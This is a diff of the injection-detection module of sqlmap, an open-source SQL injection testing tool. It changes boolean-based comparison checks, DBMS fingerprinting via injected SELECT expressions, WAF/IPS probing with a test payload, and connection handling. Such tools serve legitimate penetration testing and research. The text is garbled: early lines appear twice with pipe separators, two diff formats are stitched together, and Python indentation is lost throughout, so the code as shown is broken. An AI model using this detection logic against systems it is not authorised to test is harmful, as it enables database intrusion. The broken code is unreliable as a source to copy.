check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
|
||||||
|
|
||||||
# In case of boolean-based blind SQL injection
|
# In case of boolean-based blind SQL injection
|
||||||
if method == PAYLOAD.METHOD.COMPARISON:
|
if method == PAYLOAD.METHOD.COMPARISON:
|
||||||
# Generate payload used for comparison
|
# Generate payload used for comparison
|
||||||
def genCmpPayload():
|
def genCmpPayload():
|
||||||
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
|
sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None)
|
||||||
|
|
||||||
# Forge response payload by prepending with
|
# Forge response payload by prepending with
|
||||||
# boundary's prefix and appending the boundary's
|
# boundary's prefix and appending the boundary's
|
||||||
@@ -495,12 +522,16 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
errorResult = Request.queryPage(errorPayload, place, raise404=False)
|
||||||
if errorResult:
|
if errorResult:
|
||||||
continue
|
continue
|
||||||
elif not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
elif kb.heuristicPage and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||||
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
_ = comparison(kb.heuristicPage, None, getRatioValue=True)
|
||||||
if _ > kb.matchRatio:
|
if _ > kb.matchRatio:
|
||||||
kb.matchRatio = _
|
kb.matchRatio = _
|
||||||
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
logger.debug("adjusting match ratio for current parameter to %.3f" % kb.matchRatio)
|
||||||
|
|
||||||
|
# Reducing false-positive "appears" messages in heavily dynamic environment
|
||||||
|
if kb.heavilyDynamic and not Request.queryPage(reqPayload, place, raise404=False):
|
||||||
|
continue
|
||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
|
||||||
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
elif threadData.lastComparisonRatio > UPPER_RATIO_BOUND and not any((conf.string, conf.notString, conf.regexp, conf.code, kb.nullConnection)):
|
||||||
@@ -508,8 +539,13 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
|
trueSet = set(getFilteredPageContent(truePage, True, "\n").split("\n"))
|
||||||
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
|
falseSet = set(getFilteredPageContent(falsePage, True, "\n").split("\n"))
|
||||||
|
|
||||||
|
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
|
||||||
|
errorSet = set(getFilteredPageContent(threadData.lastErrorPage[1], True, "\n").split("\n"))
|
||||||
|
else:
|
||||||
|
errorSet = set()
|
||||||
|
|
||||||
if originalSet == trueSet != falseSet:
|
if originalSet == trueSet != falseSet:
|
||||||
candidates = trueSet - falseSet
|
candidates = trueSet - falseSet - errorSet
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
candidates = sorted(candidates, key=lambda _: len(_))
|
candidates = sorted(candidates, key=lambda _: len(_))
|
||||||
@@ -532,12 +568,18 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
else:
|
else:
|
||||||
trueSet = set(extractTextTagContent(trueRawResponse))
|
trueSet = set(extractTextTagContent(trueRawResponse))
|
||||||
trueSet = trueSet.union(__ for _ in trueSet for __ in _.split())
|
trueSet |= set(__ for _ in trueSet for __ in _.split())
|
||||||
|
|
||||||
falseSet = set(extractTextTagContent(falseRawResponse))
|
falseSet = set(extractTextTagContent(falseRawResponse))
|
||||||
falseSet = falseSet.union(__ for _ in falseSet for __ in _.split())
|
falseSet |= set(__ for _ in falseSet for __ in _.split())
|
||||||
|
|
||||||
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet)))
|
if threadData.lastErrorPage and threadData.lastErrorPage[1]:
|
||||||
|
errorSet = set(extractTextTagContent(threadData.lastErrorPage[1]))
|
||||||
|
errorSet |= set(__ for _ in errorSet for __ in _.split())
|
||||||
|
else:
|
||||||
|
errorSet = set()
|
||||||
|
|
||||||
|
candidates = filter(None, (_.strip() if _.strip() in trueRawResponse and _.strip() not in falseRawResponse else None for _ in (trueSet - falseSet - errorSet)))
|
||||||
|
|
||||||
if candidates:
|
if candidates:
|
||||||
candidates = sorted(candidates, key=lambda _: len(_))
|
candidates = sorted(candidates, key=lambda _: len(_))
|
||||||
@@ -574,10 +616,10 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
# body for the test's <grep> regular expression
|
# body for the test's <grep> regular expression
|
||||||
try:
|
try:
|
||||||
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
page, headers, _ = Request.queryPage(reqPayload, place, content=True, raise404=False)
|
||||||
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE) \
|
output = extractRegexResult(check, page, re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE) \
|
output = output or extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None, re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, listToStrValue((headers[key] for key in headers.keys() if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE) \
|
output = output or extractRegexResult(check, listToStrValue((headers[key] for key in headers if key.lower() != URI_HTTP_HEADER.lower()) if headers else None), re.DOTALL | re.IGNORECASE)
|
||||||
or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
output = output or extractRegexResult(check, threadData.lastRedirectMsg[1] if threadData.lastRedirectMsg and threadData.lastRedirectMsg[0] == threadData.lastRequestUID else None, re.DOTALL | re.IGNORECASE)
|
||||||
|
|
||||||
if output:
|
if output:
|
||||||
result = output == "1"
|
result = output == "1"
|
||||||
@@ -588,10 +630,10 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
injectable = True
|
injectable = True
|
||||||
|
|
||||||
except SqlmapConnectionException, msg:
|
except SqlmapConnectionException as ex:
|
||||||
debugMsg = "problem occurred most likely because the "
|
debugMsg = "problem occurred most likely because the "
|
||||||
debugMsg += "server hasn't recovered as expected from the "
|
debugMsg += "server hasn't recovered as expected from the "
|
||||||
debugMsg += "error-based payload used ('%s')" % msg
|
debugMsg += "error-based payload used ('%s')" % getSafeExString(ex)
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
# In case of time-based blind or stacked queries
|
# In case of time-based blind or stacked queries
|
||||||
@@ -646,18 +688,6 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
infoMsg += "there is at least one other (potential) "
|
infoMsg += "there is at least one other (potential) "
|
||||||
infoMsg += "technique found"
|
infoMsg += "technique found"
|
||||||
singleTimeLogMessage(infoMsg)
|
singleTimeLogMessage(infoMsg)
|
||||||
elif not injection.data:
|
|
||||||
_ = test.request.columns.split('-')[-1]
|
|
||||||
if _.isdigit() and int(_) > 10:
|
|
||||||
if kb.futileUnion is None:
|
|
||||||
msg = "it is not recommended to perform "
|
|
||||||
msg += "extended UNION tests if there is not "
|
|
||||||
msg += "at least one other (potential) "
|
|
||||||
msg += "technique found. Do you want to skip? [Y/n] "
|
|
||||||
|
|
||||||
kb.futileUnion = not readInput(msg, default='Y', boolean=True)
|
|
||||||
if kb.futileUnion is False:
|
|
||||||
continue
|
|
||||||
|
|
||||||
# Test for UNION query SQL injection
|
# Test for UNION query SQL injection
|
||||||
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
reqPayload, vector = unionTest(comment, place, parameter, value, prefix, suffix)
|
||||||
@@ -674,7 +704,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
kb.previousMethod = method
|
kb.previousMethod = method
|
||||||
|
|
||||||
if conf.dummy or conf.offline:
|
if conf.offline:
|
||||||
injectable = False
|
injectable = False
|
||||||
|
|
||||||
# If the injection test was successful feed the injection
|
# If the injection test was successful feed the injection
|
||||||
@@ -741,7 +771,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
|
infoMsg = "executing alerting shell command(s) ('%s')" % conf.alert
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
process = subprocess.Popen(conf.alert, shell=True)
|
process = subprocess.Popen(conf.alert.encode(sys.getfilesystemencoding() or UNICODE_ENCODING), shell=True)
|
||||||
process.wait()
|
process.wait()
|
||||||
|
|
||||||
kb.alerted = True
|
kb.alerted = True
|
||||||
@@ -763,7 +793,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
if conf.multipleTargets:
|
if conf.multipleTargets:
|
||||||
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
msg = "how do you want to proceed? [ne(X)t target/(s)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default='T', checkBatch=False).upper()
|
choice = readInput(msg, default='X', checkBatch=False).upper()
|
||||||
else:
|
else:
|
||||||
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
msg = "how do you want to proceed? [(S)kip current test/(e)nd detection phase/(n)ext parameter/(c)hange verbosity/(q)uit]"
|
||||||
choice = readInput(msg, default='S', checkBatch=False).upper()
|
choice = readInput(msg, default='S', checkBatch=False).upper()
|
||||||
@@ -816,6 +846,7 @@ def checkSqlInjection(place, parameter, value):
|
|||||||
|
|
||||||
return injection
|
return injection
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def heuristicCheckDbms(injection):
|
def heuristicCheckDbms(injection):
|
||||||
"""
|
"""
|
||||||
This functions is called when boolean-based blind is identified with a
|
This functions is called when boolean-based blind is identified with a
|
||||||
@@ -835,8 +866,8 @@ def heuristicCheckDbms(injection):
|
|||||||
if conf.noEscape and dbms not in FROM_DUMMY_TABLE:
|
if conf.noEscape and dbms not in FROM_DUMMY_TABLE:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr1)):
|
if checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr1, SINGLE_QUOTE_MARKER)):
|
||||||
if not checkBooleanExpression("(SELECT '%s'%s)='%s'" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), randStr2)):
|
if not checkBooleanExpression("(SELECT '%s'%s)=%s%s%s" % (randStr1, FROM_DUMMY_TABLE.get(dbms, ""), SINGLE_QUOTE_MARKER, randStr2, SINGLE_QUOTE_MARKER)):
|
||||||
retVal = dbms
|
retVal = dbms
|
||||||
break
|
break
|
||||||
|
|
||||||
@@ -852,6 +883,7 @@ def heuristicCheckDbms(injection):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkFalsePositives(injection):
|
def checkFalsePositives(injection):
|
||||||
"""
|
"""
|
||||||
Checks for false positives (only in single special cases)
|
Checks for false positives (only in single special cases)
|
||||||
@@ -859,8 +891,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
retVal = True
|
retVal = True
|
||||||
|
|
||||||
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or\
|
if all(_ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in injection.data) or (len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
||||||
(len(injection.data) == 1 and PAYLOAD.TECHNIQUE.UNION in injection.data and "Generic" in injection.data[PAYLOAD.TECHNIQUE.UNION].title):
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
|
|
||||||
infoMsg = "checking if the injection point on %s " % injection.place
|
infoMsg = "checking if the injection point on %s " % injection.place
|
||||||
@@ -872,7 +903,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
kb.injection = injection
|
kb.injection = injection
|
||||||
|
|
||||||
for i in xrange(conf.level):
|
for level in xrange(conf.level):
|
||||||
while True:
|
while True:
|
||||||
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
randInt1, randInt2, randInt3 = (_() for j in xrange(3))
|
||||||
|
|
||||||
@@ -914,6 +945,7 @@ def checkFalsePositives(injection):
|
|||||||
|
|
||||||
return retVal
|
return retVal
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkSuhosinPatch(injection):
|
def checkSuhosinPatch(injection):
|
||||||
"""
|
"""
|
||||||
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
|
Checks for existence of Suhosin-patch (and alike) protection mechanism(s)
|
||||||
@@ -921,7 +953,7 @@ def checkSuhosinPatch(injection):
|
|||||||
|
|
||||||
if injection.place == PLACE.GET:
|
if injection.place == PLACE.GET:
|
||||||
debugMsg = "checking for parameter length "
|
debugMsg = "checking for parameter length "
|
||||||
debugMsg += "constrainting mechanisms"
|
debugMsg += "constraining mechanisms"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
|
|
||||||
pushValue(kb.injection)
|
pushValue(kb.injection)
|
||||||
@@ -930,13 +962,14 @@ def checkSuhosinPatch(injection):
|
|||||||
randInt = randomInt()
|
randInt = randomInt()
|
||||||
|
|
||||||
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
if not checkBooleanExpression("%d=%s%d" % (randInt, ' ' * SUHOSIN_MAX_VALUE_LENGTH, randInt)):
|
||||||
warnMsg = "parameter length constrainting "
|
warnMsg = "parameter length constraining "
|
||||||
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
warnMsg += "mechanism detected (e.g. Suhosin patch). "
|
||||||
warnMsg += "Potential problems in enumeration phase can be expected"
|
warnMsg += "Potential problems in enumeration phase can be expected"
|
||||||
logger.warn(warnMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
|
@stackedmethod
|
||||||
def checkFilteredChars(injection):
|
def checkFilteredChars(injection):
|
||||||
debugMsg = "checking for filtered characters"
|
debugMsg = "checking for filtered characters"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
@@ -957,7 +990,7 @@ def checkFilteredChars(injection):
|
|||||||
|
|
||||||
# inference techniques depend on character '>'
|
# inference techniques depend on character '>'
|
||||||
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
if not any(_ in injection.data for _ in (PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.QUERY)):
|
||||||
if not checkBooleanExpression("%d>%d" % (randInt+1, randInt)):
|
if not checkBooleanExpression("%d>%d" % (randInt + 1, randInt)):
|
||||||
warnMsg = "it appears that the character '>' is "
|
warnMsg = "it appears that the character '>' is "
|
||||||
warnMsg += "filtered by the back-end server. You are strongly "
|
warnMsg += "filtered by the back-end server. You are strongly "
|
||||||
warnMsg += "advised to rerun with the '--tamper=between'"
|
warnMsg += "advised to rerun with the '--tamper=between'"
|
||||||
@@ -966,8 +999,8 @@ def checkFilteredChars(injection):
|
|||||||
kb.injection = popValue()
|
kb.injection = popValue()
|
||||||
|
|
||||||
def heuristicCheckSqlInjection(place, parameter):
|
def heuristicCheckSqlInjection(place, parameter):
|
||||||
if kb.nullConnection:
|
if kb.heavilyDynamic:
|
||||||
debugMsg = "heuristic check skipped because NULL connection used"
|
debugMsg = "heuristic check skipped because of heavy dynamicity"
|
||||||
logger.debug(debugMsg)
|
logger.debug(debugMsg)
|
||||||
return None
|
return None
|
||||||
|
|
||||||
@@ -1023,9 +1056,19 @@ def heuristicCheckSqlInjection(place, parameter):
     kb.heuristicTest = HEURISTIC_TEST.CASTED if casting else HEURISTIC_TEST.NEGATIVE if not result else HEURISTIC_TEST.POSITIVE

     if casting:
-        errMsg = "possible %s casting " % ("integer" if origValue.isdigit() else "type")
-        errMsg += "detected (e.g. \"$%s=intval($_REQUEST['%s'])\") " % (parameter, parameter)
-        errMsg += "at the back-end web application"
+        errMsg = "possible %s casting detected (e.g. '" % ("integer" if origValue.isdigit() else "type")
+
+        platform = conf.url.split('.')[-1].lower()
+        if platform == WEB_PLATFORM.ASP:
+            errMsg += "%s=CInt(request.querystring(\"%s\"))" % (parameter, parameter)
+        elif platform == WEB_PLATFORM.ASPX:
+            errMsg += "int.TryParse(Request.QueryString[\"%s\"], out %s)" % (parameter, parameter)
+        elif platform == WEB_PLATFORM.JSP:
+            errMsg += "%s=Integer.parseInt(request.getParameter(\"%s\"))" % (parameter, parameter)
+        else:
+            errMsg += "$%s=intval($_REQUEST[\"%s\"])" % (parameter, parameter)
+
+        errMsg += "') at the back-end web application"
         logger.error(errMsg)

         if kb.ignoreCasted is None:
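The reworked message above picks a casting example that matches the scripting platform guessed from the target URL's file extension. A simplified, self-contained sketch of that selection (the example URL, the query-string stripping and the PHP fallback are illustrative, not the exact library logic):

    def casting_hint(url, parameter):
        # guess the web platform from the URL's file extension, default to PHP
        platform = url.split('?')[0].split('.')[-1].lower()
        hints = {
            "asp": '%s=CInt(request.querystring("%s"))',
            "aspx": 'int.TryParse(Request.QueryString["%s"], out %s)',
            "jsp": '%s=Integer.parseInt(request.getParameter("%s"))',
        }
        template = hints.get(platform, '$%s=intval($_REQUEST["%s"])')
        return template % (parameter, parameter)

    print(casting_hint("http://www.target.com/page.asp?id=1", "id"))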
@@ -1054,13 +1097,13 @@ def heuristicCheckSqlInjection(place, parameter):
 
 if value.lower() in (page or "").lower():
 infoMsg = "heuristic (XSS) test shows that %s parameter " % paramType
-infoMsg += "'%s' might be vulnerable to cross-site scripting attacks" % parameter
+infoMsg += "'%s' might be vulnerable to cross-site scripting (XSS) attacks" % parameter
 logger.info(infoMsg)
 
 for match in re.finditer(FI_ERROR_REGEX, page or ""):
 if randStr1.lower() in match.group(0).lower():
 infoMsg = "heuristic (FI) test shows that %s parameter " % paramType
-infoMsg += "'%s' might be vulnerable to file inclusion attacks" % parameter
+infoMsg += "'%s' might be vulnerable to file inclusion (FI) attacks" % parameter
 logger.info(infoMsg)
 break
 
@@ -1090,14 +1133,6 @@ def checkDynParam(place, parameter, value):
 try:
 payload = agent.payload(place, parameter, value, getUnicode(randInt))
 dynResult = Request.queryPage(payload, place, raise404=False)
 
-if not dynResult:
-infoMsg = "confirming that %s parameter '%s' is dynamic" % (paramType, parameter)
-logger.info(infoMsg)
 
-randInt = randomInt()
-payload = agent.payload(place, parameter, value, getUnicode(randInt))
-dynResult = Request.queryPage(payload, place, raise404=False)
 except SqlmapConnectionException:
 pass
 
@@ -1157,6 +1192,8 @@ def checkDynamicContent(firstPage, secondPage):
 warnMsg += "sqlmap is going to retry the request(s)"
 singleTimeLogMessage(warnMsg, logging.CRITICAL)
 
+kb.heavilyDynamic = True
+
 secondPage, _, _ = Request.queryPage(content=True)
 findDynamicContent(firstPage, secondPage)
 
@@ -1199,7 +1236,7 @@ def checkStability():
 logger.error(errMsg)
 
 else:
-warnMsg = "target URL content is not stable. sqlmap will base the page "
+warnMsg = "target URL content is not stable (i.e. content differs). sqlmap will base the page "
 warnMsg += "comparison on a sequence matcher. If no dynamic nor "
 warnMsg += "injectable parameters are detected, or in case of "
 warnMsg += "junk results, refer to user's manual paragraph "
@@ -1284,14 +1321,14 @@ def checkRegexp():
 rawResponse = "%s%s" % (listToStrValue(headers.headers if headers else ""), page)
 
 if not re.search(conf.regexp, rawResponse, re.I | re.M):
-warnMsg = "you provided '%s' as the regular expression to " % conf.regexp
-warnMsg += "match, but such a regular expression does not have any "
-warnMsg += "match within the target URL raw response, sqlmap "
+warnMsg = "you provided '%s' as the regular expression " % conf.regexp
+warnMsg += "which does not have any match within the target URL raw response. sqlmap "
 warnMsg += "will carry on anyway"
 logger.warn(warnMsg)
 
 return True
 
+@stackedmethod
 def checkWaf():
 """
 Reference: http://seclists.org/nmap-dev/2011/q2/att-1005/http-waf-detect.nse
@@ -1304,7 +1341,7 @@ def checkWaf():
 if _ is not None:
 if _:
 warnMsg = "previous heuristics detected that the target "
-warnMsg += "is protected by some kind of WAF/IPS/IDS"
+warnMsg += "is protected by some kind of WAF/IPS"
 logger.critical(warnMsg)
 return _
 
@@ -1312,34 +1349,47 @@ def checkWaf():
 return None
 
 infoMsg = "checking if the target is protected by "
-infoMsg += "some kind of WAF/IPS/IDS"
+infoMsg += "some kind of WAF/IPS"
 logger.info(infoMsg)
 
 retVal = False
-payload = "%d %s" % (randomInt(), IDS_WAF_CHECK_PAYLOAD)
+payload = "%d %s" % (randomInt(), IPS_WAF_CHECK_PAYLOAD)
 
-value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
-value += agent.addPayloadDelimiters("%s=%s" % (randomStr(), payload))
+if PLACE.URI in conf.parameters:
+place = PLACE.POST
+value = "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
+else:
+place = PLACE.GET
+value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
+value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
 
+pushValue(kb.redirectChoice)
+pushValue(kb.resendPostOnRedirect)
 pushValue(conf.timeout)
 
+kb.redirectChoice = REDIRECTION.YES
+kb.resendPostOnRedirect = False
 conf.timeout = IDS_WAF_CHECK_TIMEOUT
 
 try:
-retVal = Request.queryPage(place=PLACE.GET, value=value, getRatioValue=True, noteResponseTime=False, silent=True)[1] < IDS_WAF_CHECK_RATIO
+retVal = Request.queryPage(place=place, value=value, getRatioValue=True, noteResponseTime=False, silent=True, disableTampering=True)[1] < IDS_WAF_CHECK_RATIO
 except SqlmapConnectionException:
 retVal = True
 finally:
 kb.matchRatio = None
 
 conf.timeout = popValue()
+kb.resendPostOnRedirect = popValue()
+kb.redirectChoice = popValue()
 
 if retVal:
 warnMsg = "heuristics detected that the target "
-warnMsg += "is protected by some kind of WAF/IPS/IDS"
+warnMsg += "is protected by some kind of WAF/IPS"
 logger.critical(warnMsg)
 
 if not conf.identifyWaf:
 message = "do you want sqlmap to try to detect backend "
-message += "WAF/IPS/IDS? [y/N] "
+message += "WAF/IPS? [y/N] "
 
 if readInput(message, default='N', boolean=True):
 conf.identifyWaf = True
@@ -1352,6 +1402,7 @@ def checkWaf():
 
 return retVal
 
+@stackedmethod
 def identifyWaf():
 if not conf.identifyWaf:
 return None
@@ -1362,7 +1413,7 @@ def identifyWaf():
 kb.testMode = True
 
 infoMsg = "using WAF scripts to detect "
-infoMsg += "backend WAF/IPS/IDS protection"
+infoMsg += "backend WAF/IPS protection"
 logger.info(infoMsg)
 
 @cachedmethod
@@ -1370,11 +1421,12 @@ def identifyWaf():
 page, headers, code = None, None, None
 try:
 pushValue(kb.redirectChoice)
-kb.redirectChoice = REDIRECTION.NO
+kb.redirectChoice = REDIRECTION.YES
 if kwargs.get("get"):
 kwargs["get"] = urlencode(kwargs["get"])
 kwargs["raise404"] = False
 kwargs["silent"] = True
+kwargs["finalCode"] = True
 page, headers, code = Request.getPage(*args, **kwargs)
 except Exception:
 pass
@@ -1389,9 +1441,9 @@ def identifyWaf():
 continue
 
 try:
-logger.debug("checking for WAF/IPS/IDS product '%s'" % product)
+logger.debug("checking for WAF/IPS product '%s'" % product)
 found = function(_)
-except Exception, ex:
+except Exception as ex:
 errMsg = "exception occurred while running "
 errMsg += "WAF script for '%s' ('%s')" % (product, getSafeExString(ex))
 logger.critical(errMsg)
@@ -1399,19 +1451,19 @@ def identifyWaf():
 found = False
 
 if found:
-errMsg = "WAF/IPS/IDS identified as '%s'" % product
+errMsg = "WAF/IPS identified as '%s'" % product
 logger.critical(errMsg)
 
 retVal.append(product)
 
 if retVal:
-if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
+if kb.wafSpecificResponse and "You don't have permission to access" not in kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
 handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
 os.close(handle)
 with openFile(filename, "w+b") as f:
 f.write(kb.wafSpecificResponse)
 
-message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename
+message = "WAF/IPS specific response can be found in '%s'. " % filename
 message += "If you know the details on used protection please "
 message += "report it along with specific response "
 message += "to '%s'" % DEV_EMAIL_ADDRESS
@@ -1428,7 +1480,7 @@ def identifyWaf():
 if not choice:
 raise SqlmapUserQuitException
 else:
-warnMsg = "WAF/IPS/IDS product hasn't been identified"
+warnMsg = "WAF/IPS product hasn't been identified"
 logger.warn(warnMsg)
 
 kb.testType = None
@@ -1436,6 +1488,7 @@ def identifyWaf():
 
 return retVal
 
+@stackedmethod
 def checkNullConnection():
 """
 Reference: http://www.wisec.it/sectou.php?id=472f952d79293
@@ -1447,11 +1500,11 @@ def checkNullConnection():
 infoMsg = "testing NULL connection to the target URL"
 logger.info(infoMsg)
 
-try:
-pushValue(kb.pageCompress)
-kb.pageCompress = False
+pushValue(kb.pageCompress)
+kb.pageCompress = False
 
-page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD)
+try:
+page, headers, _ = Request.getPage(method=HTTPMETHOD.HEAD, raise404=False)
 
 if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
 kb.nullConnection = NULLCONNECTION.HEAD
@@ -1475,9 +1528,8 @@ def checkNullConnection():
 infoMsg = "NULL connection is supported with 'skip-read' method"
 logger.info(infoMsg)
 
-except SqlmapConnectionException, ex:
-errMsg = getSafeExString(ex)
-raise SqlmapConnectionException(errMsg)
+except SqlmapConnectionException:
+pass
 
 finally:
 kb.pageCompress = popValue()
@@ -1485,18 +1537,23 @@ def checkNullConnection():
 return kb.nullConnection is not None
 
 def checkConnection(suppressOutput=False):
-if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
-try:
-debugMsg = "resolving hostname '%s'" % conf.hostname
-logger.debug(debugMsg)
-socket.getaddrinfo(conf.hostname, None)
-except socket.gaierror:
-errMsg = "host '%s' does not exist" % conf.hostname
-raise SqlmapConnectionException(errMsg)
-except socket.error, ex:
-errMsg = "problem occurred while "
-errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
-raise SqlmapConnectionException(errMsg)
+if not re.search(r"\A\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\Z", conf.hostname):
+if not any((conf.proxy, conf.tor, conf.dummy, conf.offline)):
+try:
+debugMsg = "resolving hostname '%s'" % conf.hostname
+logger.debug(debugMsg)
+socket.getaddrinfo(conf.hostname, None)
+except socket.gaierror:
+errMsg = "host '%s' does not exist" % conf.hostname
+raise SqlmapConnectionException(errMsg)
+except socket.error as ex:
+errMsg = "problem occurred while "
+errMsg += "resolving a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
+raise SqlmapConnectionException(errMsg)
+except UnicodeError as ex:
+errMsg = "problem occurred while "
+errMsg += "handling a host name '%s' ('%s')" % (conf.hostname, getSafeExString(ex))
+raise SqlmapDataException(errMsg)
 
 if not suppressOutput and not conf.dummy and not conf.offline:
 infoMsg = "testing connection to the target URL"
@@ -1509,6 +1566,10 @@ def checkConnection(suppressOutput=False):
 
 kb.errorIsNone = False
 
+if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):
+singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader)
+conf.disablePrecon = True
+
 if not kb.originalPage and wasLastResponseHTTPError():
 errMsg = "unable to retrieve page content"
 raise SqlmapConnectionException(errMsg)
@@ -1524,7 +1585,16 @@ def checkConnection(suppressOutput=False):
 else:
 kb.errorIsNone = True
 
-except SqlmapConnectionException, ex:
+threadData = getCurrentThreadData()
+
+if kb.redirectChoice == REDIRECTION.YES and threadData.lastRedirectURL and threadData.lastRedirectURL[0] == threadData.lastRequestUID:
+if (threadData.lastRedirectURL[1] or "").startswith("https://") and unicodeencode(conf.hostname) in threadData.lastRedirectURL[1]:
+conf.url = re.sub(r"https?://", "https://", conf.url)
+match = re.search(r":(\d+)", threadData.lastRedirectURL[1])
+port = match.group(1) if match else 443
+conf.url = re.sub(r":\d+(/|\Z)", ":%s\g<1>" % port, conf.url)
+
+except SqlmapConnectionException as ex:
 if conf.ipv6:
 warnMsg = "check connection to a provided "
